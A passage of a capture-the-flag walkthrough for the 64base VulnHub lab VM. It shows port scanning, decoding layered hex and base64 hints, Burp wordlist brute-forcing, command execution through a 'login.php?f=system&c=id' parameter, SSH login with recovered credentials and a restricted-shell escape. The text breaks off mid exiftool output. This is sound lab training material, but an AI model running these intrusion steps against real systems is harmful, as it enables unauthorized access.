64Base - Walkthrough




It's been a while since I've been able to work on a vulnhub image. I started looking at recent releases and came across 64base. This VM has a Star Wars theme which is always great. Plus, it was 3mrgnc3's first public VM so I had to check it out!





Flag1


We start off with running Netdiscover to find the IP address of this image:


eric@geoda:~/Documents/vulnhub/64base$ sudo netdiscover -r 192.168.56.0/24 -i vboxnet0
[sudo] password for eric: 

 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                                                                        
                                                                                                                                                                                                            
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120                                                                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:ac:0e:b4      1      60  PCS Systemtechnik GmbH                                                                                                                                   
 192.168.56.103  08:00:27:68:e7:f8      1      60  PCS Systemtechnik GmbH                                                                                                                                   

eric@geoda:~/Documents/vulnhub/64base$ 

Since the DHCP server is .100, we see that 192.168.56.103 is our target. Let's conduct an nmap scan against this to see what we are working with:


eric@geoda:~/Documents/vulnhub/64base$ sudo nmap -p- -sV 192.168.56.103

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-30 22:27 CDT
Nmap scan report for 192.168.56.103
Host is up (0.00012s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
4899/tcp  open  radmin?
62964/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.40%I=7%D=4/30%Time=5906AB2B%P=x86_64-pc-linux-gnu%r(NULL
SF:,15A,"The\x20programs\x20included\x20with\x20the\x20Fedora\x20GNU/Linux
SF:\x20system\x20are\x20free\x20software;\nthe\x20exact\x20distribution\x2
SF:0terms\x20for\x20each\x20program\x20are\x20described\x20in\x20the\nindi
SF:vidual\x20files\x20in\x20/usr/share/doc/\*/copyright\.\n\nFedora\x20GNU
SF:/Linux\x20comes\x20with\x20ABSOLUTELY\x20NO\x20WARRANTY,\x20to\x20the\x
SF:20extent\npermitted\x20by\x20applicable\x20law\.\nLast\x20login:\x20Mon
SF:\x20Oct\x2024\x2002:04:10\x204025\x20from\x20010\.101\.010\.001\n\n#\n"
SF:)%r(GenericLines,15A,"The\x20programs\x20included\x20with\x20the\x20Fed
SF:ora\x20GNU/Linux\x20system\x20are\x20free\x20software;\nthe\x20exact\x2
SF:0distribution\x20terms\x20for\x20each\x20program\x20are\x20described\x2
SF:0in\x20the\nindividual\x20files\x20in\x20/usr/share/doc/\*/copyright\.\
SF:n\nFedora\x20GNU/Linux\x20comes\x20with\x20ABSOLUTELY\x20NO\x20WARRANTY
SF:,\x20to\x20the\x20extent\npermitted\x20by\x20applicable\x20law\.\nLast\
SF:x20login:\x20Mon\x20Oct\x2024\x2002:04:10\x204025\x20from\x20010\.101\.
SF:010\.001\n\n#\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4899-TCP:V=7.40%I=7%D=4/30%Time=5906AB2B%P=x86_64-pc-linux-gnu%r(NU
SF:LL,333,"sshhh!\x20ssh!\x20droids!\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
SF:\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\
SF:n\nSo\.\.\n\nYou\x20found\x20a\x20way\x20in\x20then\.\.\.\n\nbut,\x20ca
SF:n\x20you\x20pop\x20root\?\n\n\n\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/~\\\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\|oo\x20\)\x20\x20\x20\x20Did\x20you\x20hear\x2
SF:0that\?\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20_\\=/_\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20___\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/\x20\x20_\x20\
SF:x20\\\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20/\x20\(\)\\\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20//\|/\.\\\|\\\\\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_____\|_\x20\x
SF:20\x20\x20\x20\x20\x20\x20\\\\\x20\\_/\x20\x20\|\|\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|
SF:\x20\|\x20===\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\\\|\\\x20/\|\
SF:x20\|\|\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\|_\|\x20\x20O\x20\x20\|_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20#\x20_\x20_/\x20#\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\|\x20\x20O\x20
SF:\x20\|\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\|\x20\|\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\|\|__\*__\|\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\
SF:x20\|\x20\|\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\|~\x20\\___/\x20~\|\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\[\]\|\[\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/=\\\x20/=\\\x20/=\\\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\|\x20\|\x20\|\n\x20\x20\x20\x20\x20\x20__
SF:______________\[_\]_\[_\]_\[_\]________/_\]_\[_\\______________________
SF:___\n\n\n");
MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds
eric@geoda:~/Documents/vulnhub/64base$ 

Very interesting. Looks like we are working with a few ports 22, 80, 4899 and 62964.

I take a quick look at each:

First I check out port 22:


eric@geoda:/tmp$ nc -nv 192.168.56.103 22
(UNKNOWN) [192.168.56.103] 22 (ssh) open
The programs included with the Fedora GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001

#
HI  
HI
^C
eric@geoda:/tmp$ 

Appears to be SSH.. or at least pretending to be.

I then check out port 4899:


eric@geoda:/tmp$ nc -nv 192.168.56.103 4899
(UNKNOWN) [192.168.56.103] 4899 (radmin-port) open
sshhh! ssh! droids!























































So..

You found a way in then...

but, can you pop root?



                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________


eric@geoda:/tmp$ 


This has 2 droids talking amongst each other, but I'm not sure exactly what this means. I will table this in case it comes in handy later.

I then check out port 62964:


eric@geoda:/tmp$ nc -nv 192.168.56.103 62964
(UNKNOWN) [192.168.56.103] 62964 (?) open
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
HI
Protocol mismatch.
eric@geoda:/tmp$ 

Now THIS looks like an SSH service. I will make note of this as my first SSH connection if it comes down to it.

Lastely, let's take a look at port 80. I fire up the browser:



Looking at the title, I see some text that appears to be encoded with base64. I take it to the terminal and decode:


eric@geoda:~/Documents/vulnhub/64base$ echo "dmlldyBzb3VyY2UgO0QK" | base64 -d
view source ;D
eric@geoda:~/Documents/vulnhub/64base$ 


It hints for me to view the source.

When checking the page source, I see a comment right below that same sub heading:


5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a

This value appears to be in hexidecimal. The quickest way I think to decode this value is via Burp.



So I fire it up and see that after decoding the hex value, it then produces a base64 string. I took that value and decoded it and we get our first flag!


flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}

Flag 2

After finding flag1, I notice its contents are also in base64. I decode and I'm presented with the following:


eric@geoda:~/Documents/vulnhub/64base$ echo "NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==" | base64 -d
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
eric@geoda:~/Documents/vulnhub/64base$ 

Based off this value, the first thing I think of are credentials. I immediately think about SSH and try logging into the 2 "SSH" ports that we found. Turns out that  port 62964 is the correct port running the service. However, this was without success


After a ton of enumeration with dirb and Burp, I found that there were some rabbit holes in regards to the 200 status codes that were presented. I decided to read over the website a bit more and that generating a wordlist may help with further enumeration. I use wget to accomplish this.

I first pull down the first 2 levels of the website:


eric@geoda:~/Documents/vulnhub/64base$ wget -r -l 2 192.168.56.103
--2017-04-30 23:20:49--  http://192.168.56.103/
Connecting to 192.168.56.103:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8159 (8.0K) [text/html]
Saving to: 192.168.56.103/index.html’

192.168.56.103/index.html                           100%[================================================================================================================>]   7.97K  --.-KB/s    in 0s      

2017-04-30 23:20:49 (1.01 GB/s) - ‘192.168.56.103/index.html’ saved [8159/8159]

Loading robots.txt; please ignore errors.
--2017-04-30 23:20:49--  http://192.168.56.103/robots.txt
Reusing existing connection to 192.168.56.103:80.
HTTP request sent, awaiting response... 200 OK
Length: 8196 (8.0K) [text/plain]
Saving to: 192.168.56.103/robots.txt’

[...snippet...]

2017-04-30 23:20:49 (155 MB/s) - ‘192.168.56.103/img/contact-bg.jpg’ saved [95838/95838]

FINISHED --2017-04-30 23:20:49--
Total wall clock time: 0.03s
Downloaded: 31 files, 1.8M in 0.009s (198 MB/s)
eric@geoda:~/Documents/vulnhub/64base$ 

I then replace any spaces with a new line and sort by unique instances:


eric@geoda:~/Documents/vulnhub/64base$ grep -hr "" 192.168.56.103/| tr '[:space:]' '\n' | sort | uniq > wordlist.txt

Now we just have to remove any html tags and weird characters:


egrep -v '('\,'|'\;'|'\}'|'\{'|'\<'|'\>'|'\:'|'\='|'\"'|'\/'|'\/'|'\['|'\]')' wordlist.txt | sort -u > wordlist-clean.txt

We now have a custom wordlist based off the website:


eric@geoda:~/Documents/vulnhub/64base$ wc -l wordlist-clean.txt 
26455 wordlist-clean.txt
eric@geoda:~/Documents/vulnhub/64base$

With our custom wordlist created, I turn to Burp and the Intruder to start running through it.

I look at all 200's, 300's and 400's. When searching I notice a 401 status code that caught my eye:


I see that the payload Imperial-Class gives a 401 status code indicating that we are unauthorized to view this page. I navigate to the page to see the reason why:


Ah-ha! A login screen. I remember the "credentials" that were given to us from flag1. I submit the credentials and I'm presented with a new page!


Interesting. So I check its page source and see the following message:


<!DOCTYPE html>
<html lang="en">
<body bgcolor=#000000><font color=#cfbf00>
<title>64base - login</title>
<h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>
<!-- don't forget the BountyHunter login -->

Looks like a hint to me. But what? I added BountyHunter as the next path in the URL and I'm presented with a login screen:


Excellent! Another login screen. I try the same credentials that got me to the page to see if this works

They failed.

However! When navigating to the page source, we notice a comment!


<body bgcolor=#000000><font color=#cfbf00>
<form name="login-form" id="login-form" method="post" action="./login.php"> 
  <fieldset> 
  <legend>Please login:</legend> 
  <dl> 
    <dt> 
      <label title="Username">Username:
      <input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" /> 
      </label> 
    </dt> 
  </dl> 
  <dl> 
    <dt> 
      <label title="Password">Password:
      <input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" /> 
            </label> 
    </dt> 
  </dl> 
  <dl> 
    <dt> 
      <label title="Submit"> 
      <input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" /> 
      <!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
      </label> 
    </dt> 
  </dl> 
  </fieldset> 
</form>


There's a comment with "basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a"

I noticed it was in hex. I tried to decode it and it appeared to come back in base64. However, when decoding that text, it came back as gibberish. After a while I noticed that the Username and Password ID were both in hex as well. I decided to combine all 3 strings and run the decode again:


 Excellent! We have found flag2


flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}

Flag3

Again, we notice the contents of flag2 are base64 encoded. We decode and are presented with the following:


eric@geoda:~/Documents/vulnhub/64base$ echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=" | base64 -d
https://www.youtube.com/watch?v=vJwytFWA8uA
eric@geoda:~/Documents/vulnhub/64base$ 

A youtube link. Interesting. I check it out and it appears to be calling for Burp.

I fire up Burp and start playing with the Intruder to see if i can find more information about this /Imperial-Class/BountyHunter/ directory.



I noticed that when I went directly to the /index.php directory, a 302 status code redirect was present. And what do we have here.. it's flag3!



flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}


Flag4


Now that we have flag3, it appears to be yet another base64 encoded string. So I decode it:


eric@geoda:~/Documents/vulnhub/64base$ echo "NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=" | base64 -d
53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
eric@geoda:~/Documents/vulnhub/64base$ 


Interesting. It appears to say "53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id"

I take this to the browser, however the page does not exist. Hmm. I remember that there was another page that referenced "53cr3t 5h377"  which was the WANTED poster found on the main blog:


At the bottom it says "IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377"

I take a stab at it and update the URL to add the parameters f=exec&c=id which were the contents of the flag but replace exec with system instead:


http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=id


Ah-ha! It worked. I see flag4!


flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

Flag5

Now that we have flag4, it too looks like it's in base64, I'm really starting to see a pattern here! I decode it and I'm left with:


eric@geoda:~/Documents/vulnhub/64base$ echo "NjRiYXNlOjY0YmFzZTVoMzc3Cg==" | base64 -d
64base:64base5h377
eric@geoda:~/Documents/vulnhub/64base$ 


This looks like credentials again. I try against SSH port 62964 but with no success.

eric@geoda:~/Documents/vulnhub/64base$ ssh 64base@192.168.56.103 -p 62964
64base@192.168.56.103's password: 
Permission denied, please try again.
64base@192.168.56.103's password: 

eric@geoda:~/Documents/vulnhub/64base$ 

After thinking long and hard, I remember that this VM has a lot of base64 encoding. I decide to encode the password "64base5h377" into base64 and try to login again:


eric@geoda:~/Documents/vulnhub/64base$ ssh 64base@192.168.56.103 -p 62964
64base@192.168.56.103's password: 

Last login: Tue Apr 25 18:26:31 2017 from 192.168.56.1
64base@64base:~$ 

Success!! I am on the box! Now to begin enumerating around.

The first thing I notice is the restricted shell and lack of commands I can use:


eric@geoda:~$ ssh 64base@192.168.56.103 -p 62964
64base@192.168.56.103's password: 

Last login: Mon May  1 11:04:18 2017 from 192.168.56.1
64base@64base:~$ clear
-rbash: clear: command not found
64base@64base:~$ ls
well_done_:D
64base@64base:~$ cd /
-rbash: cd: restricted
64base@64base:~$ find / -iname flag5
           __________        
       _xXXXXXXXXXXXXXXXx_
     .-         |         -.         
   _/___________|___________\_
  /             |       __    \
 / _____________|      /__\    \
/               |      \__/     \    
|               |               |      
 HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH    
|           |   |  ___   ___    |       
\           |   | |== | |==/    /         
 \__________|   | |__| |__/    /      
  \_________|___|_____________/ 
    \           |      /    / 
     `-_________|_____/___-'
            \. \|/ ./
              `-+-'
                I
               [ ]
       LS   |==| |==]]
               `-'

   Cybot Galactica's AC1 "Spy-Eye"
         Surveillance Droid
64base@64base:~$ whoami
-rbash: whoami: command not found
64base@64base:~$ pwd
/64base
64base@64base:~$ id
-rbash: id: command not found
64base@64base:~$ ls -lah
well_done_:D
64base@64base:~$ 


As you can see, I tried whoami, id, ls, find, cd and many more which I don't have shown.

What is a restricted shell anyway? It's essentially a way to limit the user's ability and allow them only a subset of commands to be executed. 

I did some research and found a great write-up by SANS on escaping restricted linux shells:

https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

The first thing they recommend is to run the "env" command to understand how your profile is configured. So, that's exactly what I do:


64base@64base:~$ env
TERM=xterm-256color
SHELL=/bin/rbash
SSH_CLIENT=192.168.56.1 51084 62964
SSH_TTY=/dev/pts/0
USER=64base
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/64base
PATH=/var/alt-bin
PWD=/64base
LANG=en_GB.UTF-8
GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01
SHLVL=1
HOME=/64base
LANGUAGE=en_GB:en
LOGNAME=64base
SSH_CONNECTION=192.168.56.1 51084 192.168.56.103 62964
_=/var/alt-bin/env
64base@64base:~$ 

Interesting, it looks like a custom PATH=/var/alt-bin. Usually you would run ls to list the contents of the directory, but since this is restricted, I can still use the echo command with an asterisk to 'glob' directory contents.


64base@64base:~$ echo /var/alt-bin/*
/var/alt-bin/awk /var/alt-bin/base64 /var/alt-bin/cat /var/alt-bin/dircolors /var/alt-bin/droids /var/alt-bin/egrep /var/alt-bin/env /var/alt-bin/fgrep /var/alt-bin/file /var/alt-bin/find /var/alt-bin/grep /var/alt-bin/head /var/alt-bin/less /var/alt-bin/ls /var/alt-bin/more /var/alt-bin/perl /var/alt-bin/python /var/alt-bin/ruby /var/alt-bin/tail
64base@64base:~$ 

Usually, once you know which commands you can execute, I could research each one of them to see if there are known shell escapes associated with them. However, a particular file caught my eye:  /var/alt-bin/droids

I run it to see what happens:



64base@64base:~$ /var/alt-bin/droids
-rbash: /var/alt-bin/droids: restricted: cannot specify `/' in command names
64base@64base:~$ 


Bah! That didn't work. But how about just "droids"? Since this is found directly in my $PATH, then I should be able to run droids all by itself without specifyinbg the full path. 

I type droids and all of a sudden I'm presented with the matrix:

  

I was able to escape with ctrl + c and now I'm presented with an ASCII image


64base@64base:~$ droids

So..

You found a way in then...

but, can you pop root?



                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________

64base@64base:~$ 

Interesting. What just happened? For some reason I get the urge to run env again since this is where I found the droids path and I'm presented with a properly updated $PATH!


64base@64base:~$ env
TERM=xterm-256color
SHELL=/bin/rbash
SSH_CLIENT=192.168.56.1 51084 62964
SSH_TTY=/dev/pts/0
USER=64base
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/64base
PATH=/var/alt-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/64base
LANG=en_GB.UTF-8
GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01
SHLVL=3
HOME=/64base
LANGUAGE=en_GB:en
LOGNAME=64base
SSH_CONNECTION=192.168.56.1 51084 192.168.56.103 62964
_=/var/alt-bin/env
64base@64base:~$ 

I then use find to look for flag5 again:


64base@64base:~$ /usr/bin/find / -name *flag5* 2>/dev/null
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
64base@64base:~$

Excellent! I found flag5:


flag5{TG9vayBJbnNpZGUhIDpECg==}  


 Flag6

 Per usual, I decode flag5:


64base@64base:~$ echo "TG9vayBJbnNpZGUhIDpECg==" | base64 -d
Look Inside! :D
64base@64base:~$ 

It is telling me to look inside. What does that mean? I run file on flag5 to see what they mean:


64base@64base:~$ file /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3
64base@64base:~$ 

Looks like this is a JPEG image! It also has a weird comment that appears to be in HEX. After I run xxd against it, I notice that the file is in, of course, base64! I decode that too:


64base@64base:~$ echo "4c5330744c5331435255644a546942535530456755464a4a566b4655525342" | xxd -p -r | base64 -d
-----BEGIN RSA PRIVATE base64: invalid input
64base@64base:~$ 

Ah-ha! It looks like the comment is the beginning of a RSA Private Key! Now, the real question is.. how do I extract the entire contents of this image?  Usually I would run exiftool against this image but it is not installed.

My next idea is downloading the image locally and examining the file.

So, I start my SSH Server:


eric@geoda:~$ sudo service ssh status
 ssh.service - OpenBSD Secure Shell server
   Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
   Active: active (running) since Tue 2017-05-02 21:04:37 CDT; 1min 18s ago
 Main PID: 6625 (sshd)
    Tasks: 1 (limit: 4915)
   CGroup: /system.slice/ssh.service
           └─6625 /usr/sbin/sshd -D

May 02 21:04:37 geoda systemd[1]: Starting OpenBSD Secure Shell server...
May 02 21:04:37 geoda sshd[6625]: Server listening on 0.0.0.0 port 22.
May 02 21:04:37 geoda sshd[6625]: Server listening on :: port 22.
May 02 21:04:37 geoda systemd[1]: Started OpenBSD Secure Shell server.
eric@geoda:~$

and SCP the file on over:


64base@64base:~$ scp /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==} eric@192.168.56.1:/tmp/flag5.jpg
Could not create directory '/64base/.ssh'.
The authenticity of host '192.168.56.1 (192.168.56.1)' can't be established.
ECDSA key fingerprint is 45:44:10:d9:e9:16:02:8b:86:b7:fc:b2:5b:a1:4c:10.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
eric@192.168.56.1's password: 
flag5{TG9vayBJbnNpZGUhIDpECg==}                                                                                                                                            100%  192KB 192.0KB/s   00:00    
64base@64base:~$ 

Now that the file has been copied down, I give myself read rights and I run exiftool to completely examine the JPEG:


eric@geoda:/tmp$ ls -lah flag5.jpg 
-------r-- 1 eric eric 192K May  2 21:07 flag5.jpg
eric@geoda:/tmp$ chmod +r flag5.jpg 
eric@geoda:/tmp$ exiftool flag5.jpg 
ExifTool Version Number         : 10.40
File Name                       : flag5.jpg
Directory                       : .
File Size                       : 192 kB
File Modification Date/Time     : 2017:05:02 21:07:52-05:00
File Access Date/Time           : 2017:05:02 21:07:52-05:00
File Inode Change Date/Time     : 2017:05:02 21:10:34-05:00
File Permissions                : r--r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
